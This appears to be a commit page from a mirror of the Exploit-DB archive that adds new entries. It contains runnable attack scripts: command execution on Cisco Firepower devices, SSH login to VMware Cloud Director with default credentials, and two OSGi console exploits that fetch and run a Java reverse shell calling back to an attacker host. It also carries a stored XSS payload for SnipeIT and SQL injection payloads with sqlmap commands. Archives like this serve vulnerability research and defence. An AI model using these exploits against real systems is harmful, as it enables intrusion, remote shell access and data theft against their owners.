bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2024-03-13

Browse source 
8 changes to exploits/shellcodes/ghdb

Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE

VMware Cloud Director 10.5 - Bypass identity verification
OSGi v3.7.2 (and below) Console - RCE
OSGi v3.8-3.18 Console - RCE

SnipeIT 6.2.1 - Stored Cross Site Scripting

Client Details System 1.0 - SQL Injection

Human Resource Management System 1.0 - 'employeeid' SQL Injection
This commit is contained in:
Exploit-DB 2024-03-13 00:16:28 +00:00
parent ce58678266
commit 98f7ce18e2
8 changed files with 785 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

117
exploits/hardware/webapps/51881.py Executable file
View file

@ -0,0 +1,117 @@
# Exploit Title: [Cisco Firepower Management Center]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]
# CVE : [CVE-2023-20048]
import requests
import json
# set the variables for the URL, username, and password for the FMC web services interface
fmc_url = "https://fmc.example.com"
fmc_user = "admin"
fmc_pass = "cisco123"
# create a requests session to handle cookies and certificate verification
session = requests.Session()
session.verify = False
# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
response = session.post(token_url, auth=(fmc_user, fmc_pass))
# check the response status and extract the access token and refresh token from the response headers
# set the access token as the authorization header for the subsequent requests
try:
if response.status_code == 200:
access_token = response.headers["X-auth-access-token"]
refresh_token = response.headers["X-auth-refresh-token"]
session.headers["Authorization"] = access_token
else:
print("Failed to get tokens, status code: " + str(response.status_code))
exit()
except Exception as e:
print(e)
exit()
# set the variable for the domain id
# change this to your domain id
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"
# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
response = session.get(devices_url)
# check the response status and extract the data as a json object
try:
if response.status_code == 200:
data = response.json()
else:
print("Failed to get devices, status code: " + str(response.status_code))
exit()
except Exception as e:
print(e)
exit()
# parse the data to get the list of device names and URLs
devices = []
for item in data["items"]:
device_name = item["name"]
device_url = item["links"]["self"]
devices.append((device_name, device_url))
# loop through the list of devices and send a GET request to the URL of each device to get the device details
for device in devices:
device_name, device_url = device
response = session.get(device_url)
# check the response status and extract the data as a json object
try:
if response.status_code == 200:
data = response.json()
else:
print("Failed to get device details, status code: " + str(response.status_code))
continue
except Exception as e:
print(e)
continue
# parse the data to get the device type, software version, and configuration URL
device_type = data["type"]
device_version = data["metadata"]["softwareVersion"]
config_url = data["metadata"]["configURL"]
# check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability
# use the values from the affected products section in the security advisory
if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
print("Device " + device_name + " is vulnerable to CVE-2023-20048")
# create a list of commands that you want to execute on the device
commands = ["show version", "show running-config", "show interfaces"]
device_id = device_url.split("/")[-1]
# loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device
# replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute
for command in commands:
command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command
response = session.post(command_url)
# check the response status and extract the data as a json object
try:
if response.status_code == 200:
data = response.json()
else:
print("Failed to execute command, status code: " + str(response.status_code))
continue
except Exception as e:
print(e)
continue
# parse the data to get the result of the command execution and print it
result = data["result"]
print("Command: " + command)
print("Result: " + result)
else:
print("Device " + device_name + " is not vulnerable to CVE-2023-20048")

75
exploits/multiple/remote/51882.py Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading
# Define a function to check if a port is open
def is_port_open(ip, port):
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set the timeout to 1 second
s.settimeout(1)
# Try to connect to the port
try:
s.connect((ip, port))
# The port is open
return True
except:
# The port is closed
return False
finally:
# Close the socket
s.close()
# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
# Create a ssh client object
client = paramiko.SSHClient()
# Set the policy to accept any host key
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Connect to the target using the credentials
client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
# Execute the command and get the output
stdin, stdout, stderr = client.exec_command(command)
# Print the output
print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
# Close the ssh connection
client.close()
# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()
# Loop through the ports and check for the vulnerability
for port in args.ports:
# Check if the port is open
if is_port_open(args.ip, port):
# The port is open, send a GET request to the port and check the status code
response = requests.get(f"http://{args.ip}:{port}")
if response.status_code == 200:
# The port is open and vulnerable
print(f"Port {port} is vulnerable to CVE-2023-34060")
# Create a thread to exploit the device
thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
# Start the thread
thread.start()
else:
# The port is open but not vulnerable
print(f"Port {port} is not vulnerable to CVE-2023-34060")
else:
# The port is closed
print(f"Port {port} is closed")

290
exploits/multiple/webapps/51878.py Executable file
View file

@ -0,0 +1,290 @@
#!/usr/bin/python
# Exploit Title: [OSGi v3.8-3.18 Console RCE]
# Date: [2023-07-28]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
# VisionSpace Technologies GmbH]
# Exploit Repository:
# [https://github.com/visionspacetec/offsec-osgi-exploits.git]
# Vendor Homepage: [https://eclipse.dev/equinox]
# Software Link: [https://archive.eclipse.org/equinox/]
# Version: [3.8 - 3.18]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Example:
# python exploit.py --rhost=192.168.0.133 --rport=1337 --lhost=192.168.0.100 \
# --lport=4444
"""
This is an exploit that allows to open a reverse shell connection from
the system running OSGi v3.8-3.18 and earlier.
"""
import argparse
import socket
import sys
import threading
from functools import partial
from http.server import BaseHTTPRequestHandler, HTTPServer
# Stage 1 of the handshake message
HANDSHAKE_STAGE_1 = \
b"\xff\xfd\x01\xff\xfd" \
b"\x03\xff\xfb\x1f\xff" \
b"\xfa\x1f\x00\x74\x00" \
b"\x37\xff\xf0\xff\xfb" \
b"\x18"
# Stage 2 of the handshake message
HANDSHAKE_STAGE_2 = \
b"\xff\xfa\x18\x00\x58" \
b"\x54\x45\x52\x4d\x2d" \
b"\x32\x35\x36\x43\x4f" \
b"\x4c\x4f\x52\xff\xf0"
# The buffer of this size is enough to handle the telnet handshake
BUFFER_SIZE = 2 * 1024
class HandlerClass(BaseHTTPRequestHandler):
"""
This class overrides the BaseHTTPRequestHandler. It provides a specific
functionality used to deliver a payload to the target host.
"""
_lhost: str
_lport: int
def __init__(self, lhost, lport, *args, **kwargs):
self._lhost = lhost
self._lport = lport
super().__init__(*args, **kwargs)
def _set_response(self):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
def do_GET(self): # pylint: disable=C0103
"""
This method is responsible for the playload delivery.
"""
print("Delivering the payload...")
self._set_response()
self.wfile.write(generate_revshell_payload(
self._lhost, self._lport).encode('utf-8'))
raise KeyboardInterrupt
def log_message(self, format, *args): # pylint: disable=W0622
"""
This method redefines a built-in method to suppress
BaseHTTPRequestHandler log messages.
"""
return
def generate_revshell_payload(lhost, lport):
"""
This function generates the Revershe Shell payload that will
be executed on the target host.
"""
payload = \
"import java.io.IOException;import java.io.InputStream;" \
"import java.io.OutputStream;import java.net.Socket;" \
"class RevShell {public static void main(String[] args) " \
"throws Exception { String host=\"%s\";int port=%d;" \
"String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \
"redirectErrorStream(true).start();Socket s=new Socket(host,port);" \
"InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \
"si=s.getInputStream();OutputStream po=p.getOutputStream()," \
"so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \
">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \
"while(si.available()>0)po.write(si.read());so.flush();po.flush();" \
"Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \
"p.destroy();s.close();}}\n" % (
lhost, lport)
return payload
def run_payload_delivery(lhost, lport):
"""
This function is responsible for payload delivery.
"""
print("Setting up the HTTP server for payload delivery...")
handler_class = partial(HandlerClass, lhost, lport)
server_address = ('', 80)
httpd = HTTPServer(server_address, handler_class)
try:
print("[+] HTTP server is running.")
httpd.serve_forever()
except KeyboardInterrupt:
print("[+] Payload delivered.")
except Exception as err: # pylint: disable=broad-except
print("[-] Failed payload delivery!")
print(err)
finally:
httpd.server_close()
def generate_stage_1(lhost):
"""
This function generates the stage 1 of the payload.
"""
stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % (
lhost.encode()
)
return stage_1
def generate_stage_2():
"""
This function generates the stage 2 of the payload.
"""
stage_2 = b"fork \"java ./RevShell.java\"\n"
return stage_2
def establish_connection(rhost, rport):
"""
This function creates a socket and establishes the connection
to the target host.
"""
print("[*] Connecting to OSGi Console...")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((rhost, rport))
print("[+] Connected.")
return sock
def process_handshake(sock):
"""
This function process the handshake with the target host.
"""
print("[*] Processing the handshake...")
sock.recv(BUFFER_SIZE)
sock.send(HANDSHAKE_STAGE_1)
sock.recv(BUFFER_SIZE)
sock.send(HANDSHAKE_STAGE_2)
sock.recv(BUFFER_SIZE)
sock.recv(BUFFER_SIZE)
def deliver_payload(sock, lhost):
"""
This function executes the first stage of the exploitation.
It triggers the payload delivery mechanism to the target host.
"""
stage_1 = generate_stage_1(lhost)
print("[*] Triggering the payload delivery...")
sock.send(stage_1)
sock.recv(BUFFER_SIZE)
sock.recv(BUFFER_SIZE)
def execute_payload(sock):
"""
This function executes the second stage of the exploitation.
It sends payload which is responsible for code execution.
"""
stage_2 = generate_stage_2()
print("[*] Executing the payload...")
sock.send(stage_2)
sock.recv(BUFFER_SIZE)
sock.recv(BUFFER_SIZE)
print("[+] Payload executed.")
def exploit(args, thread):
"""
This function sends the multistaged payload to the tareget host.
"""
try:
sock = establish_connection(args.rhost, args.rport)
process_handshake(sock)
deliver_payload(sock, args.lhost)
# Join the thread running the HTTP server
# and wait for payload delivery
thread.join()
execute_payload(sock)
sock.close()
print("[+] Done.")
except socket.error as err:
print("[-] Could not connect!")
print(err)
sys.exit()
def parse():
"""
This fnction is used to parse and return command-line arguments.
"""
parser = argparse.ArgumentParser(
prog="OSGi-3.8-console-RCE",
description="This tool will let you open a reverse shell from the "
"system that is running OSGi with the '-console' "
"option in versions between 3.8 and 3.18.",
epilog="Happy Hacking! :)",
)
parser.add_argument("--rhost", dest="rhost",
help="remote host", type=str, required=True)
parser.add_argument("--rport", dest="rport",
help="remote port", type=int, required=True)
parser.add_argument("--lhost", dest="lhost",
help="local host", type=str, required=False)
parser.add_argument("--lport", dest="lport",
help="local port", type=int, required=False)
parser.add_argument("--version", action="version",
version="%(prog)s 0.1.0")
return parser.parse_args()
def main(args):
"""
Main fuction.
"""
thread = threading.Thread(
target=run_payload_delivery, args=(args.lhost, args.lport))
thread.start()
exploit(args, thread)
if __name__ == "__main__":
main(parse())

144
exploits/multiple/webapps/51879.py Executable file
View file

@ -0,0 +1,144 @@
#!/usr/bin/python
# Exploit Title: [OSGi v3.7.2 Console RCE]
# Date: [2023-07-28]
# Exploit Author: [Andrzej Olchawa, Milenko Starcik,
# VisionSpace Technologies GmbH]
# Exploit Repository:
# [https://github.com/visionspacetec/offsec-osgi-exploits.git]
# Vendor Homepage: [https://eclipse.dev/equinox]
# Software Link: [https://archive.eclipse.org/equinox/]
# Version: [3.7.2 and before]
# Tested on: [Linux kali 6.3.0-kali1-amd64]
# License: [MIT]
#
# Usage:
# python exploit.py --help
#
# Examples:
# python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \
# --lport=4444
#
# python exploit.py --rhost=localhost --rport=1337 --payload= \
# "curl http://192.168.100.100/osgi_test"
"""
This is an exploit that allows to open a reverse shell connection from
the system running OSGi v3.7.2 and earlier.
"""
import argparse
import base64
import socket
def parse():
"""
This fnction is used to parse and return command-line arguments.
"""
parser = argparse.ArgumentParser(
prog="OSGi-3.7.2-console-RCE",
description="This tool will let you open a reverse shell from the "
"system that is running OSGi with the '-console' "
"option in version 3.7.2 (or before).",
epilog="Happy Hacking! :)",
)
parser.add_argument("--rhost", dest="rhost",
help="remote host", type=str, required=True)
parser.add_argument("--rport", dest="rport",
help="remote port", type=int, required=True)
parser.add_argument("--lhost", dest="lhost",
help="local host", type=str, required=False)
parser.add_argument("--lport", dest="lport",
help="local port", type=int, required=False)
parser.add_argument("--payload", dest="custom_payload",
help="custom payload", type=str, required=False)
parser.add_argument("--version", action="version",
version="%(prog)s 0.1.0")
args = parser.parse_args()
if args.custom_payload and (args.lhost or args.lport):
parser.error(
"either --payload or both --lport and --rport are required.")
return args
def generate_payload(lhost, lport, custom_payload):
"""
This function generates the whole payload ready for the delivery.
"""
payload = ""
if custom_payload:
payload = custom_payload
print("(*) Using custom payload.")
elif lhost and lport:
payload = \
"echo 'import java.io.IOException;import java.io.InputStream;" \
"import java.io.OutputStream;import java.net.Socket;class Rev" \
"Shell {public static void main(String[] args) throws Excepti" \
"on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \
"s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \
");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \
"ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \
"ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \
".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \
"e(pe.available()>0)so.write(pe.read());while(si.available()>" \
"0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \
";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \
");s.close();}}' > RevShell.java ; java ./RevShell.java" % (
lhost, lport)
print("(+) Using Java reverse shell payload.")
bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % (
base64.b64encode(payload.encode()))
wrapped_payload = b"fork \"%s\"\n" % (bash_payload)
return wrapped_payload
def deliver_payload(rhost, rport, payload):
"""
This function connects to the target host and delivers the payload.
It returns True if successful; False otherwise.
"""
print("(*) Sending payload...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((rhost, rport))
sock.send(payload)
sock.close()
except socket.error as err:
print(f"(-) Could not deliver the payload to {rhost}:{rport}!")
print(err)
return False
return True
def main(args):
"""
Main function.
"""
payload = generate_payload(args.lhost, args.lport, args.custom_payload)
success = deliver_payload(args.rhost, args.rport, payload)
if success:
print("(+) Done.")
else:
print("(-) Finished with errors.")
if __name__ == "__main__":
main(parse())

56
exploits/multiple/webapps/51883.txt Normal file
View file

@ -0,0 +1,56 @@
Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting
Date: 06-Oct-2023
Exploit Author: Shahzaib Ali Khan
Vendor Homepage: https://snipeitapp.com
Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
Version: 6.2.1
Tested on: Windows 11 22H2 and Ubuntu 20.04
CVE: CVE-2023-5452
Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting
(XSS) feature that allows attackers to execute JavaScript commands. The
location endpoint was vulnerable.
Steps to Reproduce:
1. Login as a standard user [non-admin] > Asset page > List All
2. Click to open any asset > Edit Asset
3. Create new location and add the payload:
<script>alert(document.cookie)</script>
4. Now login to any other non-admin or admin > Asset page > List All
5. Open the same asset of which you can change the location and the payload
will get executed.
POC Request:
POST /api/v1/locations HTTP/1.1
Host: localhost
Content-Length: 118
Accept: */*
X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/hardware/196/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;
assetsListingTable.bs.table.cardView=false; laravel_token=
eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3
ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM
d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0
01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
XSRF-TOKEN=
eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH
FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5
MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D
Connection: close
name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=
Thanks,
Shahzaib Ali Khan

24
exploits/php/webapps/51877.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: Human Resource Management System - SQL Injection
# Date: 13-01-2024
# Exploit Author: Srikar ( Exp1o1t9r )
# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html
# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip
# Version: 1.0 (Monday, October 10, 2022 - 13:37)
# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0
# Vulnerable URL and Parameter:URL:
Parameter: employeeid=2 The following payloads successfully identified SQL injection
vulnerabilities:
employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT
6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT
(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT
7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNION
ALL SELECT
NULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
- *
# Response:MySQL: 10.4.32-MariaDB
Users:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*

72
exploits/php/webapps/51880.txt Normal file
View file

@ -0,0 +1,72 @@
+ **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1
+ **Date:** 2023-26-12
+ **Exploit Author:** Hamdi Sevben
+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/
+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip
+ **Version:** 1.0
+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53
+ **CVE:** CVE-2023-7137
## References:
+ **CVE-2023-7137:** https://vuldb.com/?id.249140
+ https://www.cve.org/CVERecord?id=CVE-2023-7137
+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137
+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137
## Description:
Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database.
## Proof of Concept:
+ Go to the User Login page: "http://localhost/clientdetails/"
+ Fill email and password.
+ Intercept the request via Burp Suite and send to Repeater.
+ Copy and paste the request to a "r.txt" file.
+ Captured Burp request:
```
POST /clientdetails/ HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 317
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/clientdetails/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
uemail=user@mail.com&login=LOG+IN&password=P@ass123
```
+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database.
```
python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db
```
```
---
Parameter: uemail (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123
---
[14:58:11] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.53, PHP, PHP 8.1.6
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[14:58:11] [INFO] fetching current database
current database: 'loginsystem'
```
+ current database: `loginsystem`
![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)

7
files_exploits.csv
View file

@ -4165,6 +4165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
30362,exploits/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-16,2013-12-16,0,CVE-2013-6976;OSVDB-101097,,,,,
30415,exploits/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-22,2013-12-22,0,CVE-2013-6976;OSVDB-101097,,,,,
46263,exploits/hardware/webapps/46263.txt,"Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting",2019-01-28,"Bhushan B. Patil",webapps,hardware,443,2019-01-28,2019-01-30,1,CVE-2019-1642,"Cross-Site Scripting (XSS)",,,,
51881,exploits/hardware/webapps/51881.py,"Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE",2024-03-12,"Abdualhadi khalifa",webapps,hardware,,2024-03-12,2024-03-12,0,,,,,,
25292,exploits/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,webapps,hardware,,2013-05-07,2016-10-27,0,CVE-2013-2684;CVE-2013-2683;CVE-2013-2682;CVE-2013-2681;CVE-2013-2680;CVE-2013-2679;CVE-2013-2678;OSVDB-93065;OSVDB-93064;OSVDB-93063;OSVDB-93062;OSVDB-93061;OSVDB-93060;OSVDB-93059;OSVDB-89911,,,,,
16252,exploits/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",webapps,hardware,,2011-02-26,2011-02-26,0,OSVDB-71032,,,,,
18503,exploits/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",webapps,hardware,,2012-02-21,2012-02-21,0,OSVDB-80809,,,,,
@ -11528,6 +11529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/3220fa6a56c61cf53652e98356f94e0c6a833cd3/Vitek_RCE_and_information_disclosure.txt
44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/96892a5e7d513298b3181265055d437753dbaa55/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,remote,multiple,,2010-11-30,2013-12-08,1,OSVDB-69586,,,http://www.exploit-db.com/screenshots/idlt16000/vmware-traversal.png,,
51882,exploits/multiple/remote/51882.py,"VMware Cloud Director 10.5 - Bypass identity verification",2024-03-12,"Abdualhadi khalifa",remote,multiple,,2024-03-12,2024-03-12,0,,,,,,
28312,exploits/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",remote,multiple,,2006-07-31,2013-09-15,1,CVE-2006-2481;OSVDB-27695,,,,,https://www.securityfocus.com/bid/19249/info
28962,exploits/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,remote,multiple,,2013-10-14,2013-10-14,1,OSVDB-98804;CVE-2013-6366,"Metasploit Framework (MSF)",,,,
33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",remote,multiple,,2009-10-27,2014-05-12,1,CVE-2009-3733;OSVDB-59440,,,,,https://www.securityfocus.com/bid/36842/info
@ -12112,6 +12114,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50551,exploits/multiple/webapps/50551.txt,"orangescrum 1.8.0 - Privilege escalation (Authenticated)",2021-11-29,"Hubert Wojciechowski",webapps,multiple,,2021-11-29,2021-11-29,0,,,,,http://www.exploit-db.comos-php72-setup.zip,
46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comorientdb-3.0.17.zip,
46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comorientdb-3.0.17.zip,
